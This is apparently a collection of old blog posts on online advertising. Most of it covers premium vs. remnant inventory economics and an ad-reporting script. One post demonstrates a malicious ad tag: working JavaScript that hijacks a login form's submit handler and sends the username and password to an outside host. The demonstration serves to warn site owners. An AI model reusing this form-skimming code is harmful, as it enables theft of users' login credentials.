Notice: This blog is no longer updated. You may find a broken link or two

You can follow my new adventures @mikeonwine


Microsoft just published a paper titled Demographic Prediction Based on User’s Browsing Behavior. Humm… Microsoft… get with the party. Seems your “research paper” is remarkably similar to this patent — User profile classification by web usage analysis, which was filed by Xerox on November 1st, 2001. Microsoft claims a 30% improvement in accuracy… Xerox claims 76% accuracy back in 2001 and MSFT 79% in 2007..

The technology (although not so “new”) is fascinating. Based on the websites that you visit, four out of five times a smart statistician can predict your gender correctly.

I spent the last hour trying to prove this idea I’ve had for a while. Say you wanted to steal user’s login information for various social networking sites to steal their personal info and do who knows what with it. Well guess what… super easy to do if you can somehow get an ad (either third party or flash) on the login page of your victim site. This shouldn’t be too difficult since so many sites have login forms on practically every page.

Ok, how do you do it? Lets pretend you have a web page that has the following form on it:

<form method=\"post\" action=\"do_login.php\" id=\"passform\">
<b>User:</b><input type=\"text\" name=\"username\" /><br>
<b>Pass:</b><input type=\"password\" name=\"mypass\" /><br>
<input id=\"submitbutton\" type=\"submit\" value=\"Submit password\"/>
</form>

This is one of the most basic of HTML forms that simply takes a username and password and submits it to a login page. Normally when you fill out this form you click submit and end up being logged into the website. Now, lets imagine that we show an ad on this page. Our sketchy player above decides that he is going to steal your info using an advertisement, and guess what, it’s remarkably easy. Lets say we have the following ad-tag on the page:

<script type=\"text/javascript\" src=\"http://www.tenantnetwork.com/badad.js\"></script>

This is a very standard way of serving ads. You’ll see it pretty much through the web. Also, there are various ways through which you can execute javascript on the browser. You can either do this directly if you can serve a third party tag, or flash has various mechanisms where you can execute javascript as well. So, how do we steal your info? Super easy… here’s the javascript to do it :)

 theForm = document.forms[\'passform\'];
 oldsubmit = theForm.onsubmit;
 theForm.onsubmit = function () {
    user = theForm.childNodes[2].value;
    pass = theForm.childNodes[6].value;
    window.open(\'http://www.tenantnetwork.com/steal_pass.php?pass=\' + pass + \'&user=\' + user,
                 \"mywindow\",\"menubar=0,resizable=0,width=350,height=150\");
    oldsubmit();
 } ;

 document.write(\'<img src=\"http://www.tenantnetwork.com/samplead.gif\"/>\');

So what does this code do? We store a copy of the original form submission JS into “oldsubmit”, then we simply replace the existing form submit and grab the username and password you’ve input and then send it to a third party website. I happened to choose my failed real estate site, was the only third party I could get access to =). Not bad right? Note that I transmitted the info using a popup window but I’m sure the smarter guys out there could think of a hundred different ways of doing this.

Own a website that people login to? I would highly recommend removing any and all untrusted third party content from pages that have sensitive information.

I’ve put together a very simple working example here. This page shows a login form with a third party ad. Try putting in a random username and pass, you should see a popup from the “third party” that served the ad with a nice little message =).

IAB released some more stats this past week, and it looks like performance spending is growing quickly. In 2005 performance based ads were 41% of online display dollar, and this year it’s 47%. (Also note 2005 it was 5.1 billion and 2006 7.9 billion). Huge growth!

Read the article on MediaPost here .

If you haven’t already, be sure to read Part I and Part II first.

We’ve already discussed my two major reasons why we should stop talking about premium vs. remnant, namely:

  1. Inventory is deemed premium based on the buyer and has absolutely nothing to do at all with the actual ad impression beind sold
  2. The best techniques for maximizing revenue for publishers are not specific to performance or brand

In this point I’d like to talk about remnant specifically. Namely, looking at recent patterns I expect non reserved inventory to grow at a far faster pace than reserved inventory. Specifically, I think more and more dollars are going to shift from traditional reserved inventory over to unreserved. Here are five reasons why:

1. Brand advertisers are starting to care about performance

All advertisers are realizing how much quality matters. Although brand metrics might be fuzzier than pure conversion metrics, an ad on Yahoo’s homepage will perform better than on a random article page on the New York Times. More and more brand advertisers are realizing that they can efficiently track performance with online media. The challenge is, how do you track performance when there is no direct online purchase? Sure, clicks measure some sort of performance, but a click from one person might be worth far less than a click from another.

As more inventory becomes available, I expect brand focused advertisers to think of more and more inventive ways to track campaign performance. My Coke Rewards is a great example of a traditional brand advertiser tying traditional sales with online performance. I’ve seen these ads everywhere and I’m sure they’re tracking signups and repeat visitors per media buy.

2. You cannot reserve inventory and optimize on performance

Reserving means setting a price before you buy. Setting a price before you buy means that you can’t adjust your price based on how different slices of inventory perform. Although you can track performance with a reserved/premium buy, you cannot easily optimize. Changing pricing will be a manual and slow process.

3. Ad quality differs greatly between publishers

I’ve looked at a lot of data over the past couple years and performance between sites differs greatly. Some sites will literally have 100x the click and conversion rates over crappier sites. Quality impacts price, and this huge differential in price makes it rather difficult to reserve inventory. Tie this with #1 and #2 above and for any advertiser to start buying effectively they are going to have to start pricing based on performance. This means fewer bulk fixed reserved buys and more CPC, CPA and easily adjusted CPM campaigns. As I pointed out in Part I and Part II of this series, whether or not inventory if premium or remnant depends solely on who the buyer of the impression is, not the actual impression. Hence, fewer reserved guaranteed means more remnant inventory.

4. Optimization technologies are getting better

It’s amazing what people are coming up with these days. Optimization technologies are getting a lot of press these days, and it seems that at every Ad-Tech there are a couple dozen new companies with some new cool modeling technology. I’ve worked with a couple of these companies and it seems that every one I talk to is better than the last. As these technologies improve, the incentive to buy based on performance becomes far more interesting than buying a fixed chunk of inventory at a flat rate — hence, more remnant.

5. User-Gen content is growing like crazy

There’s just a plain shitload of user-gen content out there nowadays. Myspace, Facebook, Youtube, Xanga, Photobucket… shall I keep going? Most of this inventory goes unreserved. Everyone is expecting this to grow more and more.

Thoughts

A lot of the arguments above are dependent on my definition of premium as any reserved inventory. Essentially I believe that more and more online buying is going to move towards performance based pricing. This will strike a good blow to the traditional “premium vs. remnant” selling strategies. It’s also about time we start to talk about the marketplace as a whole, no more about two separate worlds.

In fact, I think we should scrap the word ‘remnant’ altogether. Hell, lets scrap the word premium too! Instead of these two, lets talk about — pre-reserved vs. optimized inventory. Or, the forward-contract vs spot-exchange markets. How about relationship vs. performance based advertisers? Anything but premium vs. remnant!

Just saw this ad for the US Air Force. Seems they’ve taken a pointer from all the “shoot the duck for a free ipod” except with a bit of an army twist! “Rollover the hotspot to attack”.

Amazing…

Update: Seems that you can’t actually “attack” the guy when the flash is embedded from my site. Will see if I can fix, but basically when you click on each ‘hot spot’ an attack dog comes out and tackles the guy.

In Part I we discussed some basic economics and then analyzed the aggregate supply curve that we see in online advertising. We also brought to the table one argument against ‘premium’ vs ‘remnant’. In this post we will look at the demand side of the equation and discuss some arguments for and against splitting out the advertiser market.

What is Demand?

Whereas the supply curve modeled all the possible sources of ad-inventory, the demand curve models all the individuals that want said inventory and have the dollars to buy it. There are many different types of buyers out there, and everyone will put them in different buckets. It’s actually quite confusing, some say ‘premium v. remnant’, some say ‘brand v. performance’ and some other will give you 18 different categories of buyers. Big brand, small brand, big performance conscious brand… etc. etc. etc. For the purposes of this post we will stick with ‘premium’ and ‘remnant’. We will consider premium the pre-reserved demand and remnant everything else.

Premium Demand

Typically coming from ad-agencies, premium demand had some very interesting characteristics. As Greg Yardley pointed out in the comments of Part I, it’s not so much ‘premium’ as a ‘forward contract’. What this means is that most will consider premium premium not because it’s special, simply because someone has reserved this inventory before-hand. The majority of reserved inventory goes to — agencies. Agencies want to ensure that they spend all of their allocated budget by the end of the month/quarter, hence they reserve large portions of inventory before hand to ensure they hit their goals.

Because of the nature of agency budgets and reservation systems, short term premium demand is simply a fixed dollar amount . Think about it — agencies get a certain budget to spend for the quarter and fight their hardest to spend every last penny. If they don’t then they’ll have less money to spend next quarter. Now of course agencies will try to get the best inventory possible for the amount of money that they have to spend, but it’s really a battle between publishers as to how big a slice of the premium money pie they can get.

Lets take a hypethetical economy which has premium advertisers that want to spend $10,000. These advertisers will pay a rate that depends primarily on the amount of inventory that is available to them. If the marketplace only had one million impressions available, then the advertiser would buy the inventory for $10 CPM (CPM == Cost per Mille, or price per thousand impressions). That way:

$10.00 CPM * 1M imps = $10,000

On the contrary, if there were ten million impressions available for purchase then the advertiser would simply pay $1 CPM. That way:
$1.00 CPM * 10M imps = $10,000

Starting to get the picture? “But Agencies care about performance!!” you might respond…. Well, how do you track ‘performance’ for Ford? Are you going to track the number of cars that people buy online? Brand metrics are fuzzy by nature — people track “aided brand awareness”, “message association” and “brand favourability” (source)! Well — enough words! We can quite easily depict the “fixed $ demand” idea as a demand curve. If we know that $10,000 will go to premium advertisers then as shown above we can calculate the price that will be paid for each possible quantity of inventory. Price X Quality must equal the total dollar demand at each point. If we plot all the points we would get something like this:


Graph 3

Ok, so now it’s pretty easy to show what would happen in a world where there was only ‘premium demand’, and a fixed amount of short term supply. You’d simply get:


Graph 4

The equilibrium price, ‘Pe’ would simply be the intersection of the ‘premium demand’ and the fixed supply curve. No matter what the quantity is, the total value of the market stays the same — it’s simply the amount of dollars allocated for that time period. The rates will simply change according to how much supply is available.

“Remnant” Demand

Of course the world really isn’t that simple. Enter remnant demand. I myself have never really like the term remnant but that’s primarily because way too many people pronounce it remAnant. So what is it? I guess people will have their own definitions but I would classify it as anything that hasn’t been reserved at a fixed price. Any CPA or CPC based deal would most likely classify as remnant, as well as any non-guaranteed CPM buys.

Remnant demand is a little more sensible than premium demand — performance will generally matter for these advertisers. This means that there is no longer a ‘fixed’ amount of money flowing into the marketplace, rather, the amount differs depending on the quantity and price at any given point in time. If inventory is cheap an advertiser will buy higher quantities than if the inventory is more expensive. Visually it would look something like this:


Graph 5

The price paid by the publisher would be the intersection of the two curves — OR — if he is successful at some basic Price Discrimination it may be the area under the remnant demand curve (my economics is getting fuzzy). The really interesting question is: what happens when you combine remnant and premium?

The Aggregate Demand Curve

The way to combine the interaction of the premium and remnant demand curves is to think like a publisher. First, lets overlay the two graphs:


Graph 55

Now, lets imagine that all supply is controlled by one publisher and that as this publisher we are guaranteed the $10k in premium demand and now simply have to figure out how to price my inventory to maximize my total revenue. Well, lets think about this. Imagine that the quantity of inventory available in the marketplace sits very close to the left of the graph, a bit to the left of the intersection of the premium and remnant demand curves. At this point the supply curve intersects the two curves where the premium curve is above the remnant curve hence the publisher will allocate all of his inventory to premium demand. This makes a lot of sense right? The premium publisher will pay a higher price which would net the publisher higher revenue.

So here’s the question — what happens when supply lies to the right of this intersection? Well, what would you do if you were the publisher? What I would do is pretty simple. I’d convince premium advertisers that they have to pay more to reserve and allocate a the percentage of my inventory to the left of the intersection to them at a high price — one that’s would generally be higher than the one that remnant advertisers would pay. All other inventory I would sell to remnant advertisers. Ok, so what does this look like? Well simple! We simply vertically add the two curves as follows:


supply_demand_6.jpg

We can simply combine the premium and remnant demand curves to form the aggregate demand curve.

Lets get back to the point

Ok, so that was a whole buncha mumbo jumbo economics. What was the point? We drew some fancy curves and discussed some intersections… so what? Well, we were talking about premium and remnant, specifically why people should stop splitting out the online ad market between the two. Well, how does the above help us? Well first off, from a marketplace perspective it is not difficult to combine premium and remnant. This is my second argument against splitting out the two. When a publisher is trying to maximize revenue, he should be thinking about aggregate demand, not premium and remnant.

Think about some things that might maximize revenue:

  1. Improve page quality for ad performance
  2. Attract more and higher quality users
  3. Increase visitor frequency
  4. Improve sales efforts
  5. Improve monetization/optimization tactics
  6. Leverage behavioral data

How many of these apply solely to premium or remnant? None of them. All of the above are tools that a salesperson can use to grab a bigger piece of the premium pie. All of the above are also things that can help performance advertisers optimize their campaigns. Sure, selling to premium advertisers is different from selling to remnant advertisers, but that can easily be solved by hiring diverse salespeople and focusing them on the right areas. Nowadays most publisher get a significant portion of their revenue from remnant, hence when talking about growth rates in revenue we are really talking about growth in aggregate demand. Here’s the thing — the best techniques for maximizing revenue for publishers are not specific to performance or brand.

So all you fancy wall street analysts — when you’re asking large publishers whether their new focus on behavioral technologies will decrease revenues from premium inventory — stop and think about what you’re saying. There is no such thing as ‘premium inventory’. There is ‘premium demand’, but except for sales no company should make it one of their strategic goals to increase their share of this pool.

Final Thoughts

Before Greg can steel some of my thunder again — part III of this series will be about the growth of remnant and why I expect growth rates in “premium demand’ to slow whereas “remnant demand” will continue to grow drastically. (no it’s not related to social networking). I would also like to mention in the spirit of full disclosure that I know very little about the agency business and most of the statements I made above are based on things I’ve heard from colleagues and friends but not from personal experience.

Also — my economics are definitely fuzzy. I wish I had more time to go and read my old textbooks again, but sadly that isn’t the case. I would greatly appreciate pointers on mistakes I’ve made as I’m sure I’ve oversimplified the problem by quite a bit.

Readers — I’ve been looking for a breakdown of online advertising dollars by buyer-type (e.g. Agency, Direct Marketer, etc.), and can’t seem to find a reliable source anywhere. Does anybody know where I can find reliable figures?

If there is one thing that I have yet to understand about the online advertising business is the insistence in splitting available inventory into two buckets: premium and remnant. Well, I’ve had enough of it. I’m going to lay out my arguments as to why this differentiation is plain silly and I challenge all that use these terms to tell me why in heavens name you should continue to use them. Don’t get me wrong, from a sales perspective it makes sense to split efforts into Agency & Others, (e.g. Premium & Remnant), but from an overall monetization perspective is does not. Yet, when Yahoo held a call with analysts to discuss the Right Media acquisition, multiple “wall street experts” asked questions around “How is this going to impact pricing on remnant?” “Does this mean that Yahoo will focus more on remnant monetization than premium?” (not direct quotes as I couldn’t find a transcript anywhere). Hopefully I can make a good case.

Some Basic Economics of Supply & Demand

Lets start off by discussing some very basic economics — supply & demand. In today’s online advertising marketplace, supply is provided by publishers with ad inventory to sell and demand comes from advertisers and marketers that have dollars to spend. In a traditional supply and demand model suppliers have some flexibility in terms of the amount of goods that they can produce, and buyers will vary the goods they buy based on the market price. E.g., there are very many young kids that would buy an XBox for $10, but Microsoft wouldn’t put very many systems on shelves at that price. So through normal market mechanics some sort of balance price and quantity is found which in generally the intersection of the supply & demand curves. (by the way — if all of this is foreign to you, please go read this wikipedia article). Here’s an example of a traditional supply/demand curve:


supply_demand_11.JPG

Note that these graphs generally refer to the short term. E.g., think of this as a ‘snapshot’ today, or this month. Over the year, Microsoft may change the way they produce Xboxes and this might change the behavior of their entire supply curve. Also, Nintendo might come out with a competing product which pushes the demand curve down.

‘Supply’ in Online Advertising

Now, this simple model doesn’t apply to very much at all as every single product/commodity/industry is slightly different. Online advertising itself is a rather peculiar case, especially on the Supply side of things. First of all, how do we measure supply? Well, most people you ask would probably say “impressions, DUH!“. WRONG. One impression is most definitely not the same as another. A well educated male user with a high income interested in buying a car is worth a heck of a lot more than a 14 year old girl posting on her Myspace page. That’s the thing — the quality of supply changes not only per publisher, but also per user and page. Certain users are worth more… Certain pages are also worth more, not because contextual technology might work, but because the ad might be displayed more prominently, or because this is a page that users tend to stay on for a long time.

Ok, so now what? Well, theoretically we could draw out one individual supply curve for every possible combination of user quality and page, but obviously that’s not very feasible. What we can do is aggregate all of these together into a more theoretical “aggregate supply curve”. Normally aggregate supply is used when observing markets as a whole… which seems fitting here. Now, a normal aggregate supply curve is upward sloping as in the figure above — this is not the case in online advertising.

What’s interesting in online advertising is that publishers do not control the amount of inventory they have. Think about it — you’re the New York Times — is there any way that you could influence the number of visitors to your site TODAY? I guess theoretically you could advertise, but considering this isn’t very cost effective (e.g. a click costs a lot more than the impressions you’d garner), we’ll ignore this case. You could also make the argument that at a certain price the publisher should simply stop serving ads to reduce the overhead in bandwidth and various leasing fees that may come with his adserving solution. The problem is, the publisher won’t know what the price is until after he has sent the impression to his adserver, at which point you might as well serve even the cheapest ad as some money is better than nothing. So what does that mean for our supply & demand curves? Well, rather simple — we simply get a straight line, as follows:


supply_demand_2.jpg

In the graph above, the price for inventory is determined solely by demand. Note that I didn’t draw any separation on the supply side between “premium” and “remnant”. You simply can’t, because there really is no differentiation on supply based on these two factors. One impression on Yahoo! Mail’s login page for a twenty year old male might be premium one second and remnant the next. It’s not dependent on any supply factors, simply on which type of advertiser is buying the inventory. So here comes the first argument against premium & remant — inventory is deemed premium based on the buyer and has absolutely nothing to do at all with the actual ad impression beind sold.

Why is it that we would refer to them differently when the actual inventory is the same? It’s not like we can split the inventory — the same impression can be premium one day and remnant the next. So that’s the first reason why I think the market should stop thinking about “premium vs. remnant”, and instead look at overall supply.

Some Final Thoughts on ‘Supply’

One of the things that I struggled with greatly while writing this post was actually how to model supply. I was hoping to do something fancier than simply place a straight line on my graph. Why is this? Well — as I mentioned above, supply is really a function of user quality, page quality and user timing. For example, the same user on the same page is more valuable the first time he looks at it than the second. How does one forecast this? Intuitively I think people know that the growth rate in supply today is mostly in low quality inventory. Why? Well, people talk about “remnant” inventory growing with sites like Myspace, Youtube and Photobucket. This inventory has very high user frequency, generally low ages and hence is lower quality.

If someone has had some luck actually coming up with a good way to theoretically model a publisher’s supply I would love to hear it. Actually.. just post a comment!

Stay tuned for Part II — We’ll look at demand, and provide more arguments as to why the phrase “premium vs. remnant” should
never again be uttered when discussing the online advertising industry.

For publishers one of the must frustrating aspects of dealing with ad-networks is probably the powerless feeling you get when one of your user’s complains about a particularly offensive, annoying or suggestive ad that they just saw. So what can you do? Here’s a quick and easy method to provide a “report this ad” button for your site.
Here’s the normal process of ad call:
– You put a tag on your page, script src=”some.adserver.com/someparameters”>
– Browser requests javascript, and it returns something like — document.write(‘‘);
– User sees some.ad.com/ad.jpg

So how do you create a button to ‘report an ad’? Simple! You simply create a wrapper function around document.write() to capture all the output. Then, all you need to do is a little bit of smart javascript and badabing you’re done! Credits to this page for the document.write JS;.

So how do you wrap document.write()? Rather easily! Check it out this IE specific example:

(function(){
        var documentWrite = document.write ;
        var createWrapper = function(s){
                writeOutput = writeOutput + "\\n\\n" + s;
                return s;
        };

        document.write = function(s){
               documentWrite(createWrapper(s) );
               document.close();
        }
})();

As you can see this is remarkably simple. Every time document.write() is called we simply append the call to a variable ‘writeOutput’, which you can then do whatever you want with. I’ve created a fully functional example that has the full browser compatible javascript. It takes the writeOutput from an RMX Direct tag and puts it in a textarea at the top. You can grab the javascript by just viewing the source. The PHP code for “report_ad.php” is extremely simple:

$adcontent = htmlentities($_POST["adcontent"]);
$report = htmlentities($_POST["addetails"]);

echo "<b>Here is the email you send yourself:</b><br><br>\n";

echo "<b>Subject:</b> Uhoh, someone reported an ad!<br>\n";
echo "<b>User Comments:</b> $report<br><br> Here is what happened on the page when the user saw the ad:<br><br>\n";

Now, it’s important to realize that this isn’t a perfect way to do it. If the advertiser is wrapping content in an IFRAME then this method will simply show you the IFRAME source. Also, I’m not sure this will work for all networks. I’ve tested it with RMX Direct and Fastclick/Valueclick and it seems to work for both. In the document.write() output you can clearly see the source for the flash files being served. In any case, I hope this will be useful to somebody.

Lawyer sleuths out mystery around ‘Winfixer’

Video of “end user experience” posted on Youtube: Fraudware Special Report:

Proving the link to the alleged perpetrators, their connections to Winfixer all the way through to the effects on Ochoa’s computer will be very difficult, she said.

“Forensics is everything,” she said.

This is very very true. If you look at my ‘Errorsafe‘ page, you see that the whois registration for each domain varies widely. This is a great step and I wish them the best of luck in tracking down the responsible parties and shutting down their operations.